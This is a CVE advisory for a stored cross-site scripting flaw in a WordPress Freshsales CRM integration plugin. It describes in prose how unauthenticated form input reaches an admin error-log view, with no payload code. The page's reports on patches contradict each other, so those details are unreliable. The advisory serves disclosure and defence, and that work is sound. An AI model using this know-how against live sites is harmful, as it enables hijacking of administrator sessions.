CVE-2026-8901
Description
The Integration for Freshsales – Contact Form 7, WPForms, Elementor, Gravity Forms and More plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Form Submission Data in all versions up to, and including, 1.0.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. The injected payload only executes when a CRM API call fails for the submitted form and an administrator subsequently views the error log details modal in the WordPress admin panel.
Affected products
3<=1.0.15+ 1 more
- (no CPE)range: <=1.0.15
- (no CPE)range: <=1.0.15
- WordPress/Integration for Freshsales – Contact Form 7, WPForms, Elementor, Gravity Forms and Morellm-createRange: <=1.0.15
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The plugin fails to properly sanitize user-supplied data before storing it in the error log, allowing for the injection of arbitrary web scripts."
Attack vector
An unauthenticated attacker can submit form data containing malicious JavaScript. This script is stored in the error log when a CRM API call fails. The injected script is then executed when an administrator views the error log details modal in the WordPress admin panel. This vulnerability is triggered by insufficient input sanitization and output escaping within the form submission process [ref_id=1].
Affected code
The vulnerability resides in the `add_error_log` function within the `fw-error-log.php` file. This function is responsible for inserting error details, including form data, into the `integrazo_fwcrm_form_error_log` database table. The provided code snippets from versions 1.0.14 and 1.0.15 show the relevant section where form data is processed before being inserted into the database [ref_id=1, ref_id=2].
What the fix does
The patch addresses the vulnerability by implementing proper input sanitization and output escaping for the form data stored in the error log. Specifically, the `add_error_log` function in `fw-error-log.php` now correctly encodes potentially harmful characters within the `$form_data` before it is stored as a JSON string. This prevents the injection of arbitrary web scripts, as the data will be treated as literal text rather than executable code when displayed to an administrator.
Preconditions
- authThe attacker does not need to be authenticated.
- inputThe attacker must submit form data containing JavaScript payloads.
- configA CRM API call must fail for the submitted form.
- authAn administrator must view the error log details modal.
Generated on Jun 6, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
10- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.14/assets/js/error-log.jsnvd
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.14/src/db/fw-error-log.phpnvd
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.14/src/forms/submit-action.phpnvd
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.14/src/product/fw-errorlog-action.phpnvd
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.15/assets/js/error-log.jsnvd
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.15/src/db/fw-error-log.phpnvd
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.15/src/forms/submit-action.phpnvd
- plugins.trac.wordpress.org/browser/crm-integration-freshworks-any-form/tags/1.0.15/src/product/fw-errorlog-action.phpnvd
- plugins.trac.wordpress.org/changesetnvd
- www.wordfence.com/threat-intel/vulnerabilities/id/a4c8cf71-e9b0-4241-b975-f52aeb823318nvd
News mentions
0No linked articles in our index yet.